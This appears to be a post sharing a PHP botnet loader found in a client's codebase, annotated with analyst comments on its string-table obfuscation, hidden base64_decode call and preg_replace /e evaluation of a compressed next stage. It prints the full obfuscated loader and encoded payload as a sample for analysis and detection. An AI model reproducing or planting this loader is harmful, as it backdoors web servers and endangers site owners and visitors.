Found this botnet code in a client's codebase. This is the code the first obfuscated layer was executing. (Whitespace added for your convenience.) http://ryepdx.com/2013/02/deobfuscating-a-botnet-infection/
<?php
/*versio:2.18*/
// Loader stage of an obfuscated PHP implant (sample kept for analysis; do not run it on a live host).
// $III1 is set to 0 here and then overwritten through $GLOBALS below; at file scope both
// names refer to the same variable.
$III1=0;
// Everything down to the closing brace runs only if IlI11lll() is not defined yet.
// Presumably this keeps a second injected copy from redeclaring the function, which
// would be a fatal error and expose the infection -- TODO confirm against other infected files.
if (!function_exists('IlI11lll')){
// Packed string table: base64 fragments separated by filler characters and addressed
// purely by (offset, length) pairs, so no readable string appears in the file.
// Fragments that decode by eye appear to include `base64_decode`, `HTTP_USER_AGENT`,
// `HTTP_EXECPHP` and a comma-separated list of search-engine crawler names; the large
// middle section starts with the base64 form of `eval(gzuncompress(base64_decode("`,
// i.e. a further compressed layer.
// NOTE(review): the literal is broken across two lines in this listing. A newline inside
// a single-quoted string counts as one character, so if the break is not present in the
// file as found, every offset past it is off by one here. Decode from the original file,
// offline, rather than from this copy, and take hostnames/paths from that decode.
$GLOBALS['III1'] = 'uUY3VybARX2luaXQ.YWxsb3dfdXJsX2ZvcGVuMQaHR0cDovLwu_JndheT1maWxlX2dldF9jb250ZW50cwDX3NldG9wdAf}lX2V4ZWMZJndheT1jdXJswxO#!~Lwb3Nvbi5pbgYS1pbi1hLWNpcmNsZS5jb20w^ecGhwYWlkZS5jb20kYcdwPSBWV8OgLcZGlzcGxheV9lcnJvcnMQsKZGV0ZXJtaW5hdG9yuBZnRwMTMLKMi4xOAGUVFRT1EwT1EwT09RT1FP~YmFzZTY0X2RlY29kZQ_WYmFzZTY0X2VuY29kZQt~SFRUUF9IT1NU)X;dW5pb24Oc2VsZWN0U&OPMeUkVRVUVTVF9VUkkP_@U0NSSVBUX05BTUUrUVVFUllfU1RSSU5HPw #HLL3RtcC8uZm9udC11bml4!=gVE1QGqu_VEVNUAw*PVE1QRElSyfhkdG1wQ%nd3AtY29udGVudC91cGxvYWRzd3AtY29udGVudC9jYWNoZQ@}dXBsb2FkX3RtcF9kaXIx^u@dL3RtcALLgdmVyc2lv %(LLQj;qxLXBocA=@rSFRUUF9FWEVDUEhQ ~$b3V0b2s~~ySFRUUF9VU0VSX0FHRU5URcoYLAKgZ29vZ2xlLHlhaG9vLGJpbmcsbXNuYm90LGFzayxiYWlkdSx5YW5kZXgL3BnLnBocD91PQ!*Jms9KHTJnQ9cGhwJnA9tJnY9Qg}ZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5VlYvdHYya2dRL2xjMktJcHN5Zlg1Z1hsY3ppZFFTaTZXY2pnUXFGU2xrVVhOa2xnMU5yTE5wVkhFLzM0eis3Q1h4RW52bWg4S083TXpPNC92bXlIWkVPMWtUVGRKUnRkYVowMHJXbXlUYkZYbFJVZlhYOGhtbjhWVmttZEVsVVFibW0rMDB5Qkk3ZFEyeU5ucHpMSm00WXo0WkxxOHZ0YkpDMmxPdGtsYzVGV3lwVnBWN0tsK1RncGE3WXVNcUNiZzlOQjRlcURWSmttcEJqYmdMelRBV0RnTHcxQkhzNkVGbjhGc2tBYTJuYWFwNWhpa0IvZVpKVHNBaWRBeGE0MmhRZnFnTVVxeUpDcHBwZFVDdTI4UXg5SU5nZzlJSUE5TTVhRkZSU2UrNHRMRlExMkVDWUZhL2dnZmpEZWpPTThxbWxWbFk4SUYvN2FsRTVPSWdOZ25GcEhaMlBRZ2p5NDRxdk1qVEdObWFGcFNmSjdNVUVSL0ppVzRFREZqbVU0RHNHS25FUDVJbkdvaUtmQ2xMU2tEaDczcUhQMkVvVFZyVFp3bk1pZnNhTUtMUVM2VzgrdndaaEhCZndiNW41SGFsZ3RxanY2aDRhdkorUE5rYm14V0VQcUhpdlBKWWptZkx1Ymo2ZTBsWEJBOTlyNytSVGlkVGk0V2krRHZTYmhjR01SaktZQkh6bVlzZVR3YjhoNmFpdmRGR3NWcFhsTGxGTXRCdDd2cVdST1hvUWlObVNaV2UyQVF5UEtocVNyVGtWWEZGdUlRUU9lYk1vOS81RHVhTmEwL3NIajd3MWVERlJrTTgwZmpDeVI4ZUNlQ2x0WG1uQnpERTBMYTdQYXlmUkMvbmI4bUMvSWlLblU0ZTFvOSsvZ1NXcEdyeGVMbU45dTB2aFhmc3F1OHJINUhOZmEwQXg1MWVJL1pBUVBlemRWTkZONDI3V003TnVMRXhQTXZrL2x0RUU1YmZDOUxXbndhUHdCbTBEZzN4b3hMQjArUFNBWW5IL0NQaUU4bloyZEVlOFUzNUZNai9nTmUwMlRLeEl3RFpKWEgyTTZBVWRGb0krc3Q2WW4xQlNNZStuT1g1bXVxZGVvM0d0SWs2TzB6WkJpaGZXZmROM2hPdHUzM1FJLzV4RC9vRHN0aWhSb1h4ZXBab1NISFpkQlN3R2E3Y09TNFIwY2VBdEJEWk5WaytsUWtGV1Z
OQ3Y4TUJuRkl4WXRzSDd3TDdDV2FqaXNwNU1lSkR0UkhHMkdJWDZrTm5hdTVRb21JcGZhZjd5c29PTTlJaUZ3T1dvQk1NRW5qeDF4NU94S1NxNXRDVWVtaWdjZTZTRncwV2Y0NnJFcHZDWDJBQ1JqcXZPMzVVR3VrRGtMSDdnbSs1MnczOHh1eEl3WUZ4NmlsU055QkdES1FJT2dsUmRMMTJIeEFHTUJaa0NxaVhnOGNEWmdJNkRnSUZOR2dGbkV3K2E4cHRKYVlmbGtWVlo3bVQ3VFFScWZSN1dRT1VMcHI5SzBlSTFOc3RFMWUwRlg4Q0hXTkVOQ3Jrb2hrK244MldjZTZnOGxkenRzZURwdDZ1d2pZUHRhYldiZ1QxKy85Rmo2VE0rbDlXeERKNEwvWk9zQ3J0Sk9rWk5CNUcyTFhaVjE5enlmdSszTEczMi9GUFp1TGtUSmJVNGhkRG0xeC95dnpwcm9DREJGOU9Pbytzc2l4SUprYTJOdVhaVzI3VmNmSmhnS2NCLzVvdS9ia01EQkZYNXFDWjBVejh0NkQxa3Y5ZFZKa0t5QytLTG9NcmlkUnBKdWZnemtNdTNEK0ZiemRqT2RqK0NpMmdpQ29XVWFOYWlnMm9wYjNkUjFBYUZlL2J4ZTZGa0tFQ3lmVEwrOWNPNWE0ckVWYUpkS2FDSzJoZ3k0dVNsMjlWUUw5NUxTTGtGd2NCK042cytGNURFRkRYU1ZTai9zM3lCR3FSTm9RVjdnSHdGemdjRG9SaTRBNGxOdFlhcHQrYS83NXBsbEd5S2lyN3lrOXZzbWVqdHNZUHp3bjM4SC9qM3BDVk51ZC95WStqMitrcG1nYjRhS3VVZ2ZIZVBRMUdpOFhWNTE3M3hkcWtvTWxvNDRFVnl0bVdZRU15WWlLUTQrUGRrR2lxcUNQbWF2M2s1UU5HRUdPYmVqekdFMGkrbkRLMEg5V3Fid0ZObjd4UEp3TTNhTzZJZis3T3B0QnNDTlhtc1UreW9Uelh4V1FRZWFyeXZmeEkvL0tmaHpFNlg1Tm96eUxxVHprTE1kWE5BVHZDRFpCbXNVNHhjV1JKR3EyUDQ4K3BtcHZ5R2ZGRVZYTGJhTFc2dGtJUVRXb0hzNStENlo2M1htMi9ZckkrUk9NV25yaSs1ZHNjK1pxYXFqOFJ4UU9lblZWN1BVQk8zYVhUMWt3MGhTME4reGlrbVZyTllLK3hSYW1saDdvMitJSzd4bzJBQU5PT00xUE83Ym93SUxVL0xvN2YxV1N3M0hudzkrL2t4VVhuQT09IikpKTs(cHJlZ19yZXBsYWNlu&';
/**
 * String-table accessor for the obfuscated blob in $GLOBALS['III1'].
 *
 * Takes $b bytes of the blob starting at byte offset $a and returns that
 * slice base64-decoded.
 *
 * @param int $a byte offset into the blob
 * @param int $b number of bytes to take
 * @return string|false result of base64_decode() on the slice
 */
function IlI11lll($a, $b){
$c=$GLOBALS['III1'];
// pack('H*', ...) converts the hex digits to the string "base64_decode". The hex is split
// into two concatenated literals and the result is invoked as a variable function, so the
// name never appears in the file as text; a scan for the literal `base64_decode` will not
// match this loader. Hunting for pack('H*' feeding a variable call is the more useful signal.
$d=pack('H*','626173'.'6536345f6465636f6465');
return $d(substr($c, $a, $b));
};
// Resolve a function name from the string table. The blob as listed ends with the base64
// form of `preg_replace`, which is presumably what offset 3285 / length 16 selects
// (offsets not re-counted here -- confirm by decoding the original file offline).
$Q00Q0QOQQ = IlI11lll(3285, 16);
// The pattern carries the /e modifier and matches the subject string exactly, so the
// "replacement" -- the decoded slice (721, 2563) of the blob -- is evaluated as PHP code.
// In effect this is eval() of the next stage without the word `eval` appearing in the file.
// That slice, as listed, begins with `eval(gzuncompress(base64_decode("`, so the next stage
// is itself compressed and encoded.
// The /e modifier was deprecated in PHP 5.5 and removed in PHP 7.0: if the resolved function
// is preg_replace, this call only raises a warning on PHP 7+ and the payload never runs.
// For triage, decode the slice statically (print it instead of evaluating it) in an
// isolated environment, and search the codebase for preg_replace-style calls through a
// variable with an /e pattern.
$Q00Q0QOQQ("/QO0QOO0OO/e", IlI11lll(721, 2563), "QO0QOO0OO");
};?>